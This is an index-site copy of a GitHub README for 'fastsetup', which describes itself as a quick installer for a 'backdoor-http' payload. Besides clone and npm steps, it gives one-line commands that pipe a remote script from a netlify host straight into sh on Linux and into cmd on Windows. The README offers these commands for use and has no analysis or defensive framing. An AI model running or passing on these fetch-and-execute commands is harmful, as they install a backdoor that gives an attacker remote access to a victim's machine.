An open API service indexing awesome lists of open source software.

https://github.com/miguelzacca/fastsetup

Fast setup for backdoor-http payload
https://github.com/miguelzacca/fastsetup

Last synced: 2 months ago
JSON representation

Fast setup for backdoor-http payload

Awesome Lists containing this project

README

        

# fastsetup

Fast setup for [backdoor-http](https://github.com/miguelzacca/backdoor-http) payload

## Usage

```bash
git clone https://github.com/miguelzacca/fastsetup.git
cd fastsetup
npm start
```

## super fastsetup

- Linux:

```bash
curl -L m5.netlify.app/cmd.sh | sh
```

- Windows:

```bash
curl -L m5.netlify.app/cmd.bat | cmd
```